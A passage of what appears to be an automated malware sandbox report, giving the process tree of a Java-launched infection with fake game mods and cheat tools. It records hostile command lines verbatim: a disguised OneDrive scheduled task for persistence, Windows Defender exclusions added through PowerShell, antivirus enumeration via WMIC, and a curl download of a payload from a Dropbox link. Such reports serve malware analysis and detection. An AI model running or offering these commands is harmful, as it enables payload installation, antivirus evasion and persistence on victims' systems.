  "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\6812964531.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Program Files\Java\jre-1.8\bin\java.exe
    java -jar C:\Users\Admin\download_libra.jar
    3⤵
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4820
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3744
    - - C:\Windows\system32\cacls.exe
        
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        5⤵
        
        PID:3096
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c SCHTASKS /CREATE /F /SC MINUTE /TN OneDrive\OneDriveUpdateTask /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\cache.jar
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3928
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /CREATE /F /SC MINUTE /TN OneDrive\OneDriveUpdateTask /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\cache.jar
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4004
  - - C:\Program Files\Java\jre-1.8\bin\javaw.exe
      "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\cache.jar"
      4⤵
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3208
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3128
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1976
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c wmic cpu get name
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4088
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get name
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2020
    - - C:\Users\Admin\AppData\Local\Temp\3mb_online_install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3mb_online_install.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2316
      - C:\ProgramData\Drivers\Start.exe
        
        "C:\ProgramData\Drivers\Start.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4856
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3138.tmp\3139.tmp\3149.bat C:\ProgramData\Drivers\Start.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1636
        
        C:\ProgramData\Drivers\curl.exe
        
        C:\ProgramData\Drivers\Curl.exe -L -o "C:\ProgramData\Drivers\Driver.exe" "https://www.dropbox.com/s/kws6z5mk9d0t52b/HD0Killer0Clown02.6.exe?dl=1"
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1508
    - - C:\Users\Admin\AppData\Local\Temp\minecraftfpsmod.exe
        
        "C:\Users\Admin\AppData\Local\Temp\minecraftfpsmod.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:2792
      - C:\Users\Admin\AppData\Local\Temp\._cache_minecraftfpsmod.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_minecraftfpsmod.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:1172
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\MsAgentBrowserdhcp\RJohyDXhI3BukXB8LZtFph4xzxsRiCFy2OHMYmU5wvokqlpzCh.vbe"
        7⤵
        
        PID:1180
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\MsAgentBrowserdhcp\6tdiKxJ4vs339LB2ENkEUF6gwXbV.bat" "
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3468
        
        C:\MsAgentBrowserdhcp\Bridgesurrogate.exe
        
        "C:\MsAgentBrowserdhcp/Bridgesurrogate.exe"
        9⤵
        Modifies WinLogon for persistence
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:3460
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b1ya1i5l\b1ya1i5l.cmdline"
        10⤵
        Drops file in System32 directory
        
        PID:1608
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6E02.tmp" "c:\Windows\System32\CSCA605F5B346754640A1C277F4279F9226.TMP"
        11⤵
        
        PID:2436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\backgroundTaskHost.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Libraries\RuntimeBroker.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\backgroundTaskHost.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Oracle\Java\.oracle_jre_usage\dllhost.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3484
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:1972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Synaptics.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MsAgentBrowserdhcp\Bridgesurrogate.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3740
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AvT7cIBhHY.bat"
        10⤵
        
        PID:3664
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:732
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        11⤵
        
        PID:2724
        
        C:\Recovery\WindowsRE\backgroundTaskHost.exe
        
        "C:\Recovery\WindowsRE\backgroundTaskHost.exe"
        11⤵
        
        PID:4520
      - C:\ProgramData\Synaptics\Synaptics.exe
        
        "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3096
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:3584
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\MsAgentBrowserdhcp\RJohyDXhI3BukXB8LZtFph4xzxsRiCFy2OHMYmU5wvokqlpzCh.vbe"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2072
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\MsAgentBrowserdhcp\6tdiKxJ4vs339LB2ENkEUF6gwXbV.bat" "
        9⤵
        
        PID:4604
        
        C:\MsAgentBrowserdhcp\Bridgesurrogate.exe
        
        "C:\MsAgentBrowserdhcp/Bridgesurrogate.exe"
        10⤵
        Executes dropped EXE
        
        PID:4760
    - - C:\Users\Admin\AppData\Local\Temp\cheats.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cheats.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies system executable filetype association
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1212
      - C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:3640
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        7⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:3452
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3460
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3944
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        12⤵
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:2724
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        13⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1824
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        14⤵
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:2064
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        15⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:1128
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        16⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:5092
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        17⤵
        Executes dropped EXE
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        18⤵
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:4460
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        19⤵
        Executes dropped EXE
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        20⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:712
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        21⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        22⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:5064
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        23⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4660
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        24⤵
        Executes dropped EXE
        
        PID:2404
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        25⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        26⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4912
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        27⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        28⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1608
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        29⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        30⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2980
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        31⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        32⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1516
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        33⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:208
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        34⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:5100
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        35⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        36⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5076
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        37⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:536
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        38⤵
        Executes dropped EXE
        
        PID:184
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        39⤵
        Executes dropped EXE
        
        PID:4212
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        40⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:1736
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        41⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1520
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        42⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2848
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        43⤵
        Executes dropped EXE
        
        PID:208
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        44⤵
        Executes dropped EXE
        
        PID:3932
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        45⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:864
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        46⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:3612
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        47⤵
        Executes dropped EXE
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        48⤵
        Executes dropped EXE
        Modifies system executable filetype association
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3508
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        49⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        50⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:1496
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        51⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4660
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        52⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1296
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        53⤵
        Executes dropped EXE
        
        PID:3792
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        54⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:2532
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        55⤵
        Executes dropped EXE
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        56⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        
        PID:1468
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        57⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        58⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:184
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        59⤵
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        60⤵
        Checks computer location settings
        Modifies registry class
        
        PID:3444
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        61⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        62⤵
        System Location Discovery: System Language Discovery
        
        PID:1688
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        63⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        64⤵
        Checks computer location settings
        
        PID:2408
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        65⤵
        System Location Discovery: System Language Discovery
        
        PID:684
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        66⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4092
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        67⤵
        System Location Discovery: System Language Discovery
        
        PID:756
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        68⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4804
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        69⤵
        System Location Discovery: System Language Discovery
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        70⤵
        Modifies registry class
        
        PID:732
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        71⤵
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        72⤵
        
        PID:2944
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        73⤵
        Drops file in Windows directory
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        74⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2644
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        75⤵
        System Location Discovery: System Language Discovery
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        76⤵
        System Location Discovery: System Language Discovery
        
        PID:1940
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        77⤵
        
        PID:4856
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        78⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4648
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        79⤵
        Drops file in Windows directory
        
        PID:4212
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        80⤵
        Checks computer location settings
        Modifies registry class
        
        PID:4824
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        81⤵
        System Location Discovery: System Language Discovery
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        82⤵
        Checks computer location settings
        Drops file in Windows directory
        Modifies registry class
        
        PID:1520
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        83⤵
        System Location Discovery: System Language Discovery
        
        PID:1396
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        84⤵
        Checks computer location settings
        Drops file in Windows directory
        Modifies registry class
        
        PID:1272
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        85⤵
        
        PID:888
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        86⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3396
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        87⤵
        Drops file in Windows directory
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        88⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4564
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        89⤵
        Drops file in Windows directory
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        90⤵
        Checks computer location settings
        Drops file in Windows directory
        Modifies registry class
        
        PID:3612
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        91⤵
        System Location Discovery: System Language Discovery
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        92⤵
        
        PID:1028
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        93⤵
        
        PID:4660
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        94⤵
        Checks computer location settings
        Modifies registry class
        
        PID:740
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        95⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        96⤵
        Checks computer location settings
        Drops file in Windows directory
        Modifies registry class
        
        PID:1580
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        97⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe
        98⤵
        Checks computer location settings
        Modifies registry class
        
        PID:2432
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\cheats.exe"
        99⤵
        
